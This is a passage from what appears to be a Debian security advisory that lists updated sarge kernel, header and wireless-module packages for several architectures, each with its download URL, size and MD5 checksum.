http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-2-k7-smp_2.6.8-16sarge1_i386.deb\n Size/MD5 checksum: 15118194 fb0e7f6b830b7a012f06bf7c25ff15cc\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-3-386_2.6.8-16sarge2_i386.deb\n Size/MD5 checksum: 14064090 7801ebccc8aaa6cbdf94b8f97c017f17\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-3-686_2.6.8-16sarge2_i386.deb\n Size/MD5 checksum: 15534482 11587d9502f913721dde8c98fef3b676\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-3-686-smp_2.6.8-16sarge2_i386.deb\n Size/MD5 checksum: 15343922 cc4689243c7fc2134bb4b6e89e44668a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-3-k7_2.6.8-16sarge2_i386.deb\n Size/MD5 checksum: 15260668 839c21112982d20f38b3f4ebc6337cb9\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-3-k7-smp_2.6.8-16sarge2_i386.deb\n Size/MD5 checksum: 15120180 3c0e8d9f3df47a5588618bdd0c0529f9\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-11_2.6.8-16sarge1_i386.deb\n Size/MD5 checksum: 2719920 0984a4d0f8de19308e49bc822b2d7c71\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-11-amd64-generic_2.6.8-16sarge1_i386.deb\n Size/MD5 checksum: 224274 4faa8c6ee4aceae2ea01a2398c433599\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-11-amd64-k8_2.6.8-16sarge1_i386.deb\n Size/MD5 checksum: 223264 298ec2bb85e50e58b4e0ba131648e1b2\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-11-amd64-k8-smp_2.6.8-16sarge1_i386.deb\n Size/MD5 checksum: 219174 d7422d17926f1e654627e08a71a8da94\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-11-em64t-p4_2.6.8-16sarge1_i386.deb\n Size/MD5 checksum: 220996 0433d7f8f2ce52acde87fd1518b1987c\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-11-em64t-p4-smp_2.6.8-16sarge1_i386.deb\n Size/MD5 checksum: 217432 f34fb2bc6f9986cc94b002385392ff98\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12_2.6.8-16sarge2_i386.deb\n Size/MD5 checksum: 2720230 12790a80072f9691a6aebfae99d2884a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12-amd64-generic_2.6.8-16sarge2_i386.deb\n Size/MD5 checksum: 224370 288b4255fa05983bedd12c2787159713\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12-amd64-k8_2.6.8-16sarge2_i386.deb\n Size/MD5 checksum: 223320 b0895780411c7883d4e662f59a614c09\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12-amd64-k8-smp_2.6.8-16sarge2_i386.deb\n Size/MD5 checksum: 219366 d2c62fcc31fe84998ff3ec7192adcaa9\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12-em64t-p4_2.6.8-16sarge2_i386.deb\n Size/MD5 checksum: 221098 14e8145058f41276743990373a602dc8\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-headers-2.6.8-12-em64t-p4-smp_2.6.8-16sarge2_i386.deb\n Size/MD5 checksum: 217728 ff9ec1441b3c486f2bf699aa34cd19cf\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-11-amd64-generic_2.6.8-16sarge1_i386.deb\n Size/MD5 checksum: 12558490 4696f82bada71e27c3e1918b6a453f69\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-11-amd64-k8_2.6.8-16sarge1_i386.deb\n Size/MD5 checksum: 13250408 200fcd489897d816ef3e7bfe5266541a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-11-amd64-k8-smp_2.6.8-16sarge1_i386.deb\n Size/MD5 checksum: 13210500 df01307ce5ceed0e7b34e40aef5ff56f\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-11-em64t-p4_2.6.8-16sarge1_i386.deb\n Size/MD5 checksum: 13208672 2aefa612e0e46772f15ab816dfd0ec75\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-11-em64t-p4-smp_2.6.8-16sarge1_i386.deb\n Size/MD5 checksum: 13188388 2e889282559ab1b62fbd3908ebae585d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-12-amd64-generic_2.6.8-16sarge2_i386.deb\n Size/MD5 checksum: 12559818 d106cb6e039594f39c69757139e3b81d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-12-amd64-k8_2.6.8-16sarge2_i386.deb\n Size/MD5 checksum: 13251680 6885825a1d87f69e2b9a8733bcd3149a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-12-amd64-k8-smp_2.6.8-16sarge2_i386.deb\n Size/MD5 checksum: 13213584 78a23e516db62160e02d7531fdf56ceb\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-12-em64t-p4_2.6.8-16sarge2_i386.deb\n Size/MD5 checksum: 13211806 626ac3ecedbc13b34fa972842eddc87e\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-12-em64t-p4-smp_2.6.8-16sarge2_i386.deb\n Size/MD5 checksum: 13188560 cd0f63a5cb74c21d601ffaf22230015d\n http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-3-386_0.3.7-1sarge1_i386.deb\n Size/MD5 checksum: 140430 3f2b9eba956c9d736df02ee8f8048960\n http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-3-586tsc_0.3.7-1sarge1_i386.deb\n Size/MD5 checksum: 152842 d79caea6f9eb14dc29f060f4c402623c\n http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-3-686_0.3.7-1sarge1_i386.deb\n Size/MD5 checksum: 155756 92824520277f5805f4315f59bdae29ba\n http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-3-686-smp_0.3.7-1sarge1_i386.deb\n Size/MD5 checksum: 159776 bfa56474c228de3f2225b01d555628cd\n http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-3-k6_0.3.7-1sarge1_i386.deb\n Size/MD5 checksum: 148882 bd479694e49548e272b99d651525211c\n http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-3-k7_0.3.7-1sarge1_i386.deb\n Size/MD5 checksum: 154512 2f4ca0b5a6d15d372810a4adf28db0a2\n http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-3-k7-smp_0.3.7-1sarge1_i386.deb\n Size/MD5 checksum: 158304 4baf71cc92212d7ac2cacb5913ce15bd\n http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.6.8-3-386_0.3.7-1sarge1_i386.deb\n Size/MD5 checksum: 147580 741b00a1dd08f0a3ec11807b5b5e0d21\n http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.6.8-3-686_0.3.7-1sarge1_i386.deb\n Size/MD5 checksum: 164966 3608c1954937b7c2a562c5e7cec9c82a\n http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.6.8-3-686-smp_0.3.7-1sarge1_i386.deb\n Size/MD5 checksum: 168700 f4292765662e2f76d9a2e18af8052122\n http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.6.8-3-k7_0.3.7-1sarge1_i386.deb\n Size/MD5 checksum: 163394 cde18e20701333deb222482a6bacd7ab\n http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.6.8-3-k7-smp_0.3.7-1sarge1_i386.deb\n Size/MD5 checksum: 167226 488d6c27c43fe4e6b39d3c2d8ee54be9\n http://security.debian.org/pool/updates/main/n/ndiswrapper-modules-i386/ndiswrapper-modules-2.6.8-3-386_1.1-2sarge1_i386.deb\n Size/MD5 checksum: 59506 783e00471ba34c7961a962bd92800dc6\n http://security.debian.org/pool/updates/main/n/ndiswrapper-modules-i386/ndiswrapper-modules-2.6.8-3-686_1.1-2sarge1_i386.deb\n Size/MD5 checksum: 68052 d71c7488bbe557ff73cecfb40866454c\n http://security.debian.org/pool/updates/main/n/ndiswrapper-modules-i386/ndiswrapper-modules-2.6.8-3-686-smp_1.1-2sarge1_i386.deb\n Size/MD5 checksum: 68288 572be41d7cd81949fe08696bcf44bd50\n http://security.debian.org/pool/updates/main/n/ndiswrapper-modules-i386/ndiswrapper-modules-2.6.8-3-k7_1.1-2sarge1_i386.deb\n Size/MD5 checksum: 66456 fc41d56657d638be30dbe7030ed30744\n http://security.debian.org/pool/updates/main/n/ndiswrapper-modules-i386/ndiswrapper-modules-2.6.8-3-k7-smp_1.1-2sarge1_i386.deb\n Size/MD5 checksum: 66896 ab693dc48e540eb2b7c902e5bb3f5bb0\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6-itanium_2.6.8-14sarge2_ia64.deb\n Size/MD5 checksum: 5014 b5eb10541045f43a896cff6863fabc99\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6-itanium-smp_2.6.8-14sarge2_ia64.deb\n Size/MD5 checksum: 5080 bef129992a5a0e02811924d9e2c20928\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6-mckinley_2.6.8-14sarge2_ia64.deb\n Size/MD5 checksum: 5036 6013655c76a27afb60a5596344063fac\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6-mckinley-smp_2.6.8-14sarge2_ia64.deb\n Size/MD5 checksum: 5102 07d70aca348f010c1768a8f36f35d969\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-2_2.6.8-14sarge1_ia64.deb\n Size/MD5 checksum: 3097054 691f7cd4d1b2f184e50ab566f20a13e4\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-2-itanium_2.6.8-14sarge1_ia64.deb\n Size/MD5 checksum: 198662 72e0e4b4331b8a600de3a98d6ac59a82\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-2-itanium-smp_2.6.8-14sarge1_ia64.deb\n Size/MD5 checksum: 197920 6e19efeac81a2a9416328af58316c4cb\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-2-mckinley_2.6.8-14sarge1_ia64.deb\n Size/MD5 checksum: 198394 6d946fcc7b1fcf88c9ee9a47f7015384\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-2-mckinley-smp_2.6.8-14sarge1_ia64.deb\n Size/MD5 checksum: 197828 8be7e8290bd8e7cf1b9c162c9e369b36\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-3_2.6.8-14sarge2_ia64.deb\n Size/MD5 checksum: 3097204 e62aa5944fb5f84f77a822b10dfaaec3\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-3-itanium_2.6.8-14sarge2_ia64.deb\n Size/MD5 checksum: 198498 7ce7e79e3a4a819907957fcf099a5c70\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-3-itanium-smp_2.6.8-14sarge2_ia64.deb\n Size/MD5 checksum: 198092 75130dae14a72f13a096ea69c4af4f64\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-3-mckinley_2.6.8-14sarge2_ia64.deb\n Size/MD5 checksum: 198210 013fd74c791f3529c082844d464e52bb\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-headers-2.6.8-3-mckinley-smp_2.6.8-14sarge2_ia64.deb\n Size/MD5 checksum: 197804 68e2bbb8cf37ce358688fe8bc59d23d2\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6-itanium_2.6.8-14sarge2_ia64.deb\n Size/MD5 checksum: 5010 f7d0ba9bd59a484ed8faa294f678b9cb\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6-itanium-smp_2.6.8-14sarge2_ia64.deb\n Size/MD5 checksum: 5074 c2c04705ec9f041555b60157dde8dfa9\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6-mckinley_2.6.8-14sarge2_ia64.deb\n Size/MD5 checksum: 5034 5c00d1be7ba6cc5adb92a249a955fd33\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6-mckinley-smp_2.6.8-14sarge2_ia64.deb\n Size/MD5 checksum: 5102 b54e60d375f6e7ca263662d812175a5d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-2-itanium_2.6.8-14sarge1_ia64.deb\n Size/MD5 checksum: 22041474 4419d9b68b593646ed49ff194fcbcc9e\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-2-itanium-smp_2.6.8-14sarge1_ia64.deb\n Size/MD5 checksum: 22666884 7aab34e05eed41eee4b56ca45e1c4c2c\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-2-mckinley_2.6.8-14sarge1_ia64.deb\n Size/MD5 checksum: 21959066 27fe9dc58a04851cfbbac5b4a53f21ae\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-2-mckinley-smp_2.6.8-14sarge1_ia64.deb\n Size/MD5 checksum: 22689900 4011393c3e3a94354d81c909a1aaef91\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-3-itanium_2.6.8-14sarge2_ia64.deb\n Size/MD5 checksum: 21473296 d5ba65d7f15dcb9e8978af52cd78af19\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-3-itanium-smp_2.6.8-14sarge2_ia64.deb\n Size/MD5 checksum: 22127598 56977e01aedd74201e249aa2dfb9d867\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-3-mckinley_2.6.8-14sarge2_ia64.deb\n Size/MD5 checksum: 21391968 45b8ed70f88d2b5a32acb7664084972f\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-3-mckinley-smp_2.6.8-14sarge2_ia64.deb\n Size/MD5 checksum: 22153416 86f73fcd2c8c7b38cd6f3bd62c19bd43\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-hppa/kernel-headers-2.6_2.6.8-1sarge1_hppa.deb\n Size/MD5 checksum: 1980 76a590df604e48b09ac92e97722e9b2b\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-hppa/kernel-headers-2.6-32_2.6.8-1sarge1_hppa.deb\n Size/MD5 checksum: 1994 e52a21fa353ec696fab8a7540e23cee0\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-hppa/kernel-headers-2.6-32-smp_2.6.8-1sarge1_hppa.deb\n Size/MD5 checksum: 2068 b5572d57a20cced0a4a021bc3aeca59e\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-hppa/kernel-headers-2.6-64_2.6.8-1sarge1_hppa.deb\n Size/MD5 checksum: 2000 332fb79b811586f1fdd543ec1a58fc0f\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-hppa/kernel-headers-2.6-64-smp_2.6.8-1sarge1_hppa.deb\n Size/MD5 checksum: 2066 ee4df56b5af375e3a77114b58cb7c355\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-hppa/kernel-image-2.6-32_2.6.8-1sarge1_hppa.deb\n Size/MD5 checksum: 1990 974297ab2e66bc6e45265027a9cab1cc\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-hppa/kernel-image-2.6-32-smp_2.6.8-1sarge1_hppa.deb\n Size/MD5 checksum: 2062 b9cfcd2358379c5712991999117ed580\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-hppa/kernel-image-2.6-64_2.6.8-1sarge1_hppa.deb\n Size/MD5 checksum: 1992 205b6094359187c7398018e138ed19a0\n http://security.debian.org/pool/updates/main/k/kernel-latest-2.6-hppa/kernel-image-2.6-64-smp_2.6.8-1sarge1_hppa.deb\n Size/MD5 checksum: 2052 afb79e0c218abf65b5bd8e5d754cdb38\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-2_2.6.8-6sarge1_hppa.deb\n Size/MD5 checksum: 2798740 3bd227d7f6ce63d13f4eb4cef3cc7efa\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-2-32_2.6.8-6sarge1_hppa.deb\n Size/MD5 checksum: 209500 8b284495343adf74bca8219421f4b48d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-2-32-smp_2.6.8-6sarge1_hppa.deb\n Size/MD5 checksum: 208722 941a680674931ec594e3512c5736c9bf\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-2-64_2.6.8-6sarge1_hppa.deb\n Size/MD5 checksum: 208356 7ab2df2b04391d75500083585a96701b\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-2-64-smp_2.6.8-6sarge1_hppa.deb\n Size/MD5 checksum: 207502 0a840281a00f4762978af411d7a3e7fb\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-3_2.6.8-6sarge2_hppa.deb\n Size/MD5 checksum: 2800462 f91eaebb158c9749c1d31dc383b6e0f8\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-3-32_2.6.8-6sarge2_hppa.deb\n Size/MD5 checksum: 209530 b50da9513e91589182390342683fdb8e\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-3-32-smp_2.6.8-6sarge2_hppa.deb\n Size/MD5 checksum: 208622 ae7c1f319e17331a213d7b4ce7d16989\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-3-64_2.6.8-6sarge2_hppa.deb\n Size/MD5 checksum: 208182 c0462524e02dd0c6a27541a27e459c29\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-headers-2.6.8-3-64-smp_2.6.8-6sarge2_hppa.deb\n Size/MD5 checksum: 207748 b02991119d8ccca8b9e4c31737ab695d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-2-32_2.6.8-6sarge1_hppa.deb\n Size/MD5 checksum: 16020358 6423b4288f949286ce1c70a743d03373\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-2-32-smp_2.6.8-6sarge1_hppa.deb\n Size/MD5 checksum: 16926452 be46b30fdb54c08c6cef2fcf7c9a2450\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-2-64_2.6.8-6sarge1_hppa.deb\n Size/MD5 checksum: 17472682 d8ecab478805553c2f978dd405dca57d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-2-64-smp_2.6.8-6sarge1_hppa.deb\n Size/MD5 checksum: 18305956 42ae9163eaba822e863ea8dd2cdedcaa\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-3-32_2.6.8-6sarge2_hppa.deb\n Size/MD5 checksum: 16023554 815f08d56c68ac50dcdb521e14390b7d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-3-32-smp_2.6.8-6sarge2_hppa.deb\n Size/MD5 checksum: 16927964 7b4d90cbd15ddf98609cf72d3e512660\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-3-64_2.6.8-6sarge2_hppa.deb\n Size/MD5 checksum: 17476404 963d93e651086f54efb1375234957921\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-hppa/kernel-image-2.6.8-3-64-smp_2.6.8-6sarge2_hppa.deb\n Size/MD5 checksum: 18305586 db6058c84e2f63cfe2611674114f354d\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-amiga_2.6.8-4sarge2_m68k.deb\n Size/MD5 checksum: 3305946 8ef4160b024945d31d8744b14e32f25a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-atari_2.6.8-4sarge2_m68k.deb\n Size/MD5 checksum: 3101536 3382c3e69f2fe998f0e671e8e270807d\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-bvme6000_2.6.8-4sarge2_m68k.deb\n Size/MD5 checksum: 3011458 838d87ada5760307e762f1f3ec2c91f0\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-hp_2.6.8-4sarge2_m68k.deb\n Size/MD5 checksum: 2986606 dcc8faa142a07efc35cfbcef3744406b\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-mac_2.6.8-4sarge2_m68k.deb\n Size/MD5 checksum: 3173820 c83822fd5935e4ceb7816dcede3c7b9a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-mvme147_2.6.8-4sarge2_m68k.deb\n Size/MD5 checksum: 2977534 b3449977e75ade201f49e27a44f79c1b\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-mvme16x_2.6.8-4sarge2_m68k.deb\n Size/MD5 checksum: 3046552 3694c7d1338e55cac77168122f5c4b38\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-q40_2.6.8-4sarge2_m68k.deb\n Size/MD5 checksum: 3105060 86f7a2f92ae27dd3f8b57e9aebf1b118\n http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-m68k/kernel-image-2.6.8-sun3_2.6.8-4sarge2_m68k.deb\n Size/MD5 checksum: 2991336 3a28774631beb37997d937e55a6e9454\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-latest-powerpc/kernel-headers_102sarge1_powerpc.deb\n Size/MD5 checksum: 2380 fe4724ab347b4ac3332beba5e5ccfed4\n http://security.debian.org/pool/updates/main/k/kernel-latest-powerpc/kernel-headers-2.4_102sarge1_powerpc.deb\n Size/MD5 checksum: 2396 6a2e8db727f0022e81255a442c5ebdc9\n http://security.debian.org/pool/updates/main/k/kernel-latest-powerpc/kernel-headers-2.6_102sarge1_powerpc.deb\n Size/MD5 checksum: 2396 5eb96b2b98c92b52e6f932ab475b0fec\n http://security.debian.org/pool/updates/main/k/kernel-latest-powerpc/kernel-image-2.4-powerpc_102sarge1_powerpc.deb\n Size/MD5 checksum: 2466 1d2424589e684946a5d6c7913db61976\n http://security.debian.org/pool/updates/main/k/kernel-latest-powerpc/kernel-image-2.4-powerpc-smp_102sarge1_powerpc.deb\n Size/MD5 checksum: 2514 2be237bec7e6d2878e75fc47a0222b9d\n http://security.debian.org/pool/updates/main/k/kernel-latest-powerpc/kernel-image-2.6-power3_102sarge1_powerpc.deb\n Size/MD5 checksum: 2414 dbd3d270955b623ad805839960aa96ae\n http://security.debian.org/pool/updates/main/k/kernel-latest-powerpc/kernel-image-2.6-power3-smp_102sarge1_powerpc.deb\n Size/MD5 checksum: 2442 e1b15674c71cec89a5a2e4d70461baac\n http://security.debian.org/pool/updates/main/k/kernel-latest-powerpc/kernel-image-2.6-power4_102sarge1_powerpc.deb\n Size/MD5 checksum: 2438 a3b87f2ef01a823a715ff69ee2ec8406\n http://security.debian.org/pool/updates/main/k/kernel-latest-powerpc/kernel-image-2.6-power4-smp_102sarge1_powerpc.deb\n Size/MD5 checksum: 2476 06957c6d5d9d86c9e5551275974fc18d\n http://security.debian.org/pool/updates/main/k/kernel-latest-powerpc/kernel-image-2.6-powerpc_102sarge1_powerpc.deb\n Size/MD5 checksum: 2466 60dc23b47e8c98fa7426197c1770fdb2\n http://security.debian.org/pool/updates/main/k/kernel-latest-powerpc/kernel-image-2.6-powerpc-smp_102sarge1_powerpc.deb\n Size/MD5 checksum: 2516 e08eb266e65cb83bf5dfd85c230bb48e\n http://security.debian.org/pool/updates/main/k/kernel-latest-powerpc/kernel-image-power3_102sarge1_powerpc.deb\n Size/MD5 checksum: 2400 d0a3883e658b675bef039514d5d317b9\n http://security.debian.org/pool/updates/main/k/kernel-latest-powerpc/kernel-image-power3-smp_102sarge1_powerpc.deb\n Size/MD5 checksum: 2422 e98c826345fc55bf1b4f261f0403001c\n http://security.debian.org/pool/updates/main/k/kernel-latest-powerpc/kernel-image-power4_102sarge1_powerpc.deb\n Size/MD5 checksum: 2430 6838fb393d4ea7233a0db354ca8e0d6f\n http://security.debian.org/pool/updates/main/k/kernel-latest-powerpc/kernel-image-power4-smp_102sarge1_powerpc.deb\n Size/MD5 checksum: 2468 516df5d7055341135ca824e2c7ba4c59\n http://security.debian.org/pool/updates/main/k/kernel-latest-powerpc/kernel-image-powerpc_102sarge1_powerpc.deb\n Size/MD5 checksum: 2440 84b8e93ae95a9a332835e459ae258c31\n http://security.debian.org/pool/updates/main/k/kernel-latest-powerpc/kernel-image-powerpc-smp_102sarge1_powerpc.deb\n Size/MD5 checksum: 2492 7bf7d3f281580247978af66b6bc71a9f\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-3-power3_2.6.8-12sarge2_powerpc.deb\n Size/MD5 checksum: 405208 bc0049d16d62333a59496f8448c0ae5b\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-3-power3-smp_2.6.8-12sarge2_powerpc.deb\n Size/MD5 checksum: 405122 857956fab5ea958d1f0e29d9b8082074\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-3-power4_2.6.8-12sarge2_powerpc.deb\n Size/MD5 checksum: 405120 f1d48b84ce88a36f9a250228f77b24bf\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-3-power4-smp_2.6.8-12sarge2_powerpc.deb\n Size/MD5 checksum: 405040 5aa69dd9407911e00cbd9bb1896f27b8\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-3-powerpc_2.6.8-12sarge2_powerpc.deb\n Size/MD5 checksum: 405410 9f24a2e7ea0609f7ca18dc78496a400e\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-3-powerpc-smp_2.6.8-12sarge2_powerpc.deb\n Size/MD5 checksum: 405182 1c4270a6157a596aae2fb49c41a008ee\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-power3_2.6.8-12sarge1_powerpc.deb\n Size/MD5 checksum: 405670 bd347754ea8c4cee14686b207e6cf46d\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-power3-smp_2.6.8-12sarge1_powerpc.deb\n Size/MD5 checksum: 405666 1dec752373178a4aef51f74c6d917073\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-power4_2.6.8-12sarge1_powerpc.deb\n Size/MD5 checksum: 405598 c39f371744ca92eec853ad8746f0f009\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-power4-smp_2.6.8-12sarge1_powerpc.deb\n Size/MD5 checksum: 405568 b346b94897fca3c678daadc99b515428\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-powerpc_2.6.8-12sarge1_powerpc.deb\n Size/MD5 checksum: 405912 14475ec4cdc9b337ad2dc0ab3a772bdb\n http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-build-2.6.8-powerpc-smp_2.6.8-12sarge1_powerpc.deb\n Size/MD5 checksum: 405698 4c3c94aa9afb4e6d73986bbfa26484bb\n 